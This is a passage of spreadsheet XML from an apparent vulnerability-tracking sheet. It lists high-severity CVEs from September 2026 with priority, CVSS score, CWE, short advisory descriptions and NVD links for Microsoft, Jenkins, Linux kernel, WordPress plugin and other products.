      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in Gato GraphQL &lt;= 19.2.3 versions.</t>
        </is>
      </c>
      <c r="S154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62102</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62106</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr"/>
      <c r="Q155" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in SMS Alert Order Notifications &lt;= 3.9.9 versions.</t>
        </is>
      </c>
      <c r="S155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62106</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62107</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr"/>
      <c r="Q156" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in Masteriyo - LMS &lt;= 3.4.0 versions.</t>
        </is>
      </c>
      <c r="S156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62107</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69291</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr"/>
      <c r="Q157" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69291</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71328</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr">
        <is>
          <t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t>
        </is>
      </c>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr"/>
      <c r="Q158" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71416</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr"/>
      <c r="Q159" s="5" t="inlineStr">
        <is>
          <t>CWE-1385, CWE-287</t>
        </is>
      </c>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>Headroom compresses data before the data reaches a large language model. Prior to version 0.35.0, the Headroom WebSocket server does not validate the `Origin` header of incoming client WebSocket requests before forwarding the request to the upstream server, allowing malicious WebSocket clients to perform arbitrary LLM requests without authentication. This can be exploited by a malicious WebSocket client executed in a traditional or headless browser such as lightpanda, if the browser has access to the Headroom proxy and the OpenAI API key is stored in the `OPENAI_API_KEY` environment variable. Version 0.35.0 fixes the issue.</t>
        </is>
      </c>
      <c r="S159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71416</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72984</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr">
        <is>
          <t>microsoft:edge_chromium</t>
        </is>
      </c>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr"/>
      <c r="Q160" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Microsoft Edge (Chromium-based) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72984</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73784</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr"/>
      <c r="Q161" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability in HPE IceWall products could be exploited to tamper SAML response, allowing an attacker to impersonate another user.</t>
        </is>
      </c>
      <c r="S161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73784</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77106</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr"/>
      <c r="Q162" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t>
        </is>
      </c>
      <c r="S162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77906</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr"/>
      <c r="Q163" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78224</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr"/>
      <c r="Q164" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>The XSLT Transformer Step builds a bare TransformerFactory without the proper security options set, so XXE injection can allow data exfiltration and denial-of-service attacks.</t>
        </is>
      </c>
      <c r="S164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78224</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78462</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr"/>
      <c r="Q165" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80935</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr"/>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: bound the device EEPROM address before the EFUSE copy
mt7996_mcu_get_eeprom() derives the destination of the EFUSE/EXT block
copy from the address reported by the MCU response (event-&gt;addr, a
device-controlled __le32) and clamps only the copy length, never the
destination offset into dev-&gt;mt76.eeprom.data. A malicious or
malfunctioning device can report an arbitrary address and drive an
out-of-bounds write of up to MT7996_EXT_EEPROM_BLOCK_SIZE bytes past
eeprom.data.
Reject a response whose address would place the copy outside eeprom.data
before deriving the destination pointer. Devices that echo the requested
in-bounds offset are unaffected.</t>
        </is>
      </c>
      <c r="S166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80935</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80937</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr"/>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: bound the device EEPROM address before the EFUSE copy
mt7915_mcu_get_eeprom() copies a fixed EFUSE block into the driver's
dev-&gt;mt76.eeprom.data buffer at the offset reported by the MCU response
(res-&gt;addr, a device-controlled __le32) without checking it against the
buffer size. A malicious or malfunctioning device can report an arbitrary
address and drive a 16-byte out-of-bounds write past eeprom.data.
Reject a response whose address would place the copy outside eeprom.data
before deriving the destination pointer. Devices that echo the requested
in-bounds offset are unaffected.</t>
        </is>
      </c>
      <c r="S167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80937</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80989</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr"/>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: thunderbolt: Mark the connection down when bringing it up fails
Every failure path in tbnet_connected_work() undoes its own work and
returns without clearing login_sent, so the connection still looks
established. The next tbnet_tear_down() therefore takes its main branch
and repeats a teardown that already happened: it stops rings that are
already stopped, which is a dev_WARN() and fatal under panic_on_warn,
and it releases net-&gt;remote_transmit_path even on the HopID mismatch
path, where this connection never owned that id, silently freeing one
that someone else is still using.
Clear login_sent on those paths. That is enough for tbnet_tear_down() to
leave the unwound state alone, and login_received has to stay set: it
records that the peer has logged in and carries the transmit path it gave
us, which nothing on this side can make the peer send again. Two things
change beyond keeping the teardown out of the way: the logout request in
that block is no longer sent, and the peer's next login request now
re-queues our login work rather than connected_work, giving the
connection a fresh login instead of a retry on stale state.</t>
        </is>
      </c>
      <c r="S168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80989</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84645</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K169" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr"/>
      <c r="Q169" s="5" t="inlineStr">
        <is>
          <t>CWE-915, CWE-94</t>
        </is>
      </c>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, objects of types marked as storing their configuration in independent top-level configuration files in Jenkins (such as the global configuration and jobs) can appear as nested field values in user-submitted `config.xml` documents and subsequently handle HTTP requests via Stapler, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="S169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84645</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84648</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr"/>
      <c r="Q170" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, the system log viewer does not escape log record metadata (source, level, and timestamp) resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers in control of agent processes.</t>
        </is>
      </c>
      <c r="S170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84648</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84650</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
